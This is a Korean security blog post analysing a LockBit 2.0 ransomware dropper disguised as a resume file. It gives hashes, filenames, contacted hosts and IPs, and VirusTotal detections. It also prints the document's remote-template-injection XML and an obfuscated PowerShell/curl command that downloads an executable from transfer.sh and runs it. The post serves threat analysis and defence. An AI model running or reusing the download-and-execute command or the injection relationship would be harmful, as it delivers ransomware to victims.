오늘은 이력서 로 위장해서 유포 중인 LockBit 랜섬웨어 2.0인 김기환.docx에 대해 글을 적어 보겠습니다.
해당 악성코드는 지난 시간에 적은 이태원 참사 악성코드 등과 같이 원격 템플릿 주입(Remote Template Injection) 기술을 사용을 하고 있으며 간단하게 이야기하면 순간 외부 URL에 호스팅 된 진짜 콘텐츠를 가져옴으로써 변경될 수 있다는 특징을 가지고 있으며 공격자는 해당 URL 주소를 변경시켜 악성코드를 통해서 악성행위를 진행을 하면 아마도 기업을 대상으로 공격하는 것 같습니다.
먼저 해당 악성코드의 해쉬값은 다음과 같습니다.
파일명:김기환.docx
사이즈:155 KB
CRC32:1a9baf51
MD5:4b6a088568f7293969566b7bdaf58741
SHA-1:5723299076c4a032cda695ce74ef6e54f9ab2f52
SHA-256:87e2e3291268aa3e203cfe917ee7974926bcab7d3b0f417b7b2ede4acfd2869f
SHA-512:edd7f48a7d59e7ea5eb0512b4bc39a1a2269d9866c656c1b41d1479023edc4cef15f914f290146ae3ed2e765bb207a45e906c6d3ae65dc96b1ae240faad5b919
그리고 다음과 같은 이름으로도 유포를 하고 있습니다.
=?UTF-8?B?6rmA(6)riw7ZmYLmRvY3g=?=
김기환(.)docx
87e2e3291268aa3e203cfe917ee7974926bcab7d3b0f417b7b2ede4acfd2869f(.)docx
4b6a088568f7293969566b7bdaf58741(.)docx
f7a2fc4e471a203c8a5683c02ada2c3931c8f0ec(.)bin
fdrsetrgh(.)exe
fdrsetrgh(.)exe(.)bin
fdjk483u9rey89t53e(.)exe(.)vir
$이력서_221122(경력사항도 같이 기재하였습니다 잘 부탁드립니다)(.)exe
123(.)exe
_이력서_221122(경력사항도 같이 기재하였습니다 잘 부탁드립니다)(.)exe
FE5101B50E92A923D74CC6F0F4225539(.)exe
^이력서_221122(경력사항도 같이 기재하였습니다 잘 부탁드립니다)(.)bin
#이력서_221122(경력사항도 같이 기재하였습니다 잘 부탁드립니다)(.)exe
fe5101b50e92a923d74cc6f0f4225539(.)bin
그리고 악성코드는 다음과 경로에 악성코드를 실행하기 위한 원격 템플릿 주입(Remote Template Injection)이 포함이 돼 있는 것을 확인할 수가 있습니다.
C:\Users\???\Downloads\김기환\word\_rels에 있는 settings.xml.rels 를 열어보면 다음과 같이 악성코드를 실행하기 위한 원격 템플릿 주입(Remote Template Injection)가 포함이 돼 있는 것을 확인할 수가 있습니다.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats(.)org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats(.)org/officeDocument/2006/relationships/attachedTemplate"
Target="https://transfer(.)sh/get/KgHDsr/s3g53o.dotm" TargetMode="External"/></Relationships>
해당 악성코드를 실행하면 s3g53o(.)dotm 이라는 파일을 다운로드 하게 돼 있습니다.
일단 개인적으로 2022.12.07 에서는 해당 악성코드가 샘플은 다운로드 되지 않았지만, 동작은 다음과 같이 합니다.
cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer(.)sh/get/JQJU3c/fdrsetrgh.e(^)xe -o C:\Users\Public\fdjk483u9rey89t53e(.)exe;
C:\Users\Public\fdjk483u9rey89t53e(.)exe
-> powershell /W 01 curl https://transfer(.)sh/get/JQJU3c/fdrsetrgh.exe -o
C:\Users\Public\fdjk483u9rey89t53e(.)exe;C:\Users\Public\fdjk483u9rey89t53e(.)exe
로 해서 랜섬웨어는 자동으로 설치되면 해당 악성코드가 실행되면 접속을 시도하는 사이트는 다음과 같습니다.
http://x1.c.lencr(.)org/
http://r3.o.lencr(.)org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuu(U)AlA5h%2BvnYsUwsYCEgPmmBJ%2FIwlx%2BBpaP471WFQOxA%3D%3D
transfer(.)sh
IP 트래픽은 다음과 같이 됩니다.
144.76.136(.)153:443(TCP)
209.197.3(.)8:80(TCP)
224.0.0(.)252:5355(UDP)
239.255.255(.)250:1900(UDP)
255.255.255(.)255:67(UDP)
52.109.4(.)32:443(TCP)
그리고 해당 랜섬웨어 다음과 같은 동작을 합니다.
호스트 파일을 읽기
실행 중인 모든 프로세스 목록 조회
장치의 볼륨 정보(이름, 일련번호 등)조회
파일 및 디렉터리 검색
ini 파일 쓰기
가상화, 샌드박스 회피
동적 분석을 방해하는 휴면(회피 루프) 가능
2022-12-07 07:51:25 UTC VirusTotal(바이러스토탈)에서 탐지하는 보안업체들은 다음과 같습니다.
Acronis (Static ML):Suspicious
Ad-Aware:Trojan.GenericKD.63830642
AhnLab-V3:Ransomware/Win.LockBit.C5312148
Alibaba:TrojanDropper:Win32/Injector.c937e31c
ALYac:Trojan.Ransom.LockBit
Arcabit:Trojan.Generic.D3CDFA72
Avast:NSIS:RansomX-gen [Ransom]
AVG:NSIS:RansomX-gen [Ransom]
Avira (no cloud):HEUR/AGEN.1252584
BitDefender:Trojan.GenericKD.63830642
Bkav Pro:W32.AIDetect.malware2
Comodo:Malware@#8d3ibwx0b4wb
Cylance:Unsafe
Cynet:Malicious (score: 99)
Cyren:W32/ABRisk.ZZAV-3488
DrWeb:Trojan.Encoder.34248
Elastic:Malicious (high Confidence)
Emsisoft:Trojan.GenericKD.63830642 (B)
eScan:Trojan.GenericKD.63830642
ESET-NOD32:A Variant Of Generik.CGYMBJZ
F-Secure:Heuristic.HEUR/AGEN.1252584
Fortinet:NSIS/Injector.AOW!tr
GData:Trojan.GenericKD.63830642
Google:Detected
Gridinsoft (no cloud):Ransom.Win32.Sabsik.sa
Ikarus:Trojan.NSIS.Injector
K7AntiVirus:Trojan ( 0059bbf41 )
K7GW:Trojan ( 0059bbf41 )
Kaspersky:HEUR:Trojan-Dropper.Win32.Agent.gen
Kingsoft:Win32.Troj.Undef.(kcloud)
Lionic:Trojan.Win32.Agent.Y!c
Malwarebytes:Ransom.LockBit
MAX:Malware (ai Score=100)
McAfee:Artemis!FE5101B50E92
McAfee-GW-Edition:BehavesLike.Win32.Generic.th
Microsoft:Trojan:Win32/Casdet!rfn
Panda:Trj/Chgt.AD
Rising:Trojan.Injector/NSIS!1.BFBB (CLASSIC)
Sangfor Engine Zero:Dropper.Win32.Agent.V7l9
SecureAge:Malicious
Sophos:Mal/Generic-S
Symantec:Downloader
Tencent:Win32.Trojan-Dropper.Agent.Vmhl
Trellix (FireEye):Generic.mg.fe5101b50e92a923
TrendMicro:Ransom.Win32.LOCKBIT.YXCKXZ
TrendMicro-HouseCall:Ransom.Win32.LOCKBIT.YXCKXZ
VBA32:TrojanRansom.LockBit
VIPRE:Trojan.GenericKD.63830642
VirIT:Trojan.Win32.NSISDrp.BUF
ViRobot:Trojan.Win32.Z.Injector.1593708
Webroot:W32.Ransom.Lockbit
Zillya:Dropper.Agent.Win32.518061
ZoneAlarm by Check Point:HEUR:Trojan-Dropper.Win32.Agent.gen
[소프트웨어 팁/보안 및 분석] - 랜섬웨어부터 컴퓨터를 보호해주는 랜섬웨어 보호 도구-앱체크(App Check)
이며 항상 백신 프로그램을 설치 실시간 업데이트 및 실시간 감시 그리고 사전 방역 시스템 등을 켜두고 컴퓨터를 사용하는 것이 좋으면 항상 기본적인 보안 수칙을 지키는 것이 안전하게 컴퓨터를 사용하는 방법
그리고 랜섬웨어 전용 방지 프로그램인 앱 체크를 사용한다고 하면 V3, 알약에서 기본적으로 있는 랜섬웨어 방지 기능은 비활성화시키고 사용을 하시면 될 것입니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
북한 김수키 한국인 개인정보 를 도용해서 만든 워드 악성코드-paypal.docx(2022.12.12) (0) | 2022.12.14 |
---|---|
윈도우 10 KB5021233 및 KB5021237 보안 업데이트 (0) | 2022.12.14 |
구글 크롬 메모리 절약 모드 활성화 방법 (3) | 2022.12.14 |
윈도우 7,윈도우 8.1 2023년 1월 10일 연장 지원 완전 종료 (5) | 2022.12.13 |
모질라,마이크로소프트 TrustCor 루트 인증서 브라우저에서 신뢰 인정하지 않음 (0) | 2022.12.08 |
라쿠텐(Rakuten) 계정 탈취 목적인 피싱 사이트-rakoten co ip eupphyju ml(2022.12.04) (0) | 2022.12.07 |
윈도우 11,윈도우 10 사용자 몰래 켜지는 웹캠 경고 기능 켜는 방법 (6) | 2022.12.06 |
이력서.Xll 파일로 유포중인 LockBit 2.0 랜섬웨어 (0) | 2022.12.05 |